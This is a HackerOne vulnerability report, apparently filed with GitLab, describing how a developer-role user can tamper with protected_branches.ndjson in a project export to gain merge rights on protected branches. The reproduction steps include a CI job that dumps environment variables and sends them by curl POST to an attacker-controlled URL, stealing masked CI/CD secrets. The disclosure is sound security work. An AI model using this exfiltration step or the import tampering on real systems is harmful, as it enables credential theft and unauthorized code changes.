User with developer role (group) can modify Protected branches -> Allowed to merge setting on imported project
HackerOne report #1485381 by justas_b
on 2022-02-18, assigned to @nmalcolm:
Report | Attachments | How To Reproduce
Report
Hello,
Summary
A user with developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches -> Allowed to merge setting on imported project (tree/project/protected_branches.ndjson file).
Steps to reproduce
- Create 2 accounts
- Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)
- Create a personal project with account B and export it
- Invite account B (developer) to account A's (owner) group
- With account B, modify the project import file, go to tree/project/protected_branches.ndjson
- Change the "merge_access_levels":[{"access_level":}] value to 30 if its 40
- Upload the modified project to account A's group with account B
- By default, only maintainers are allowed to merge into protected branches ("merge_access_levels":[{"access_level":}] is 40 - 40 = maintainer, 30 = developer, etc.)
- Create a new branch with account B (developer)
- Add the following .gitlab-ci.yml file to the newly created branch and create a merge request
image: ruby:latest
job_name2:
script:
- export > test.txt
- curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
[REDACTED]
- Merge the newly created branch into main (protected) branch (with account B - developer)
- A pipeline run against a protected branch will send sensitive data to attackers website using curl
[REDACTED]
The impact is pretty similar to my other report #1256017
What is the current bug behavior?
It is possible to modify the "merge_access_levels":[{"access_level":} value on imported projects
What is the expected correct behavior?
The "merge_access_levels":[{"access_level":} should always be default - 40
Relevant logs and/or screenshots
(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)
Output of checks
This bug happens on GitLab.com
Impact
User with developer role (group) can steal masked group and project CI/CD variables. Developer can also modify main branch without maintainer's permission.
Attachments
How To Reproduce
Please add reproducibility information to this section: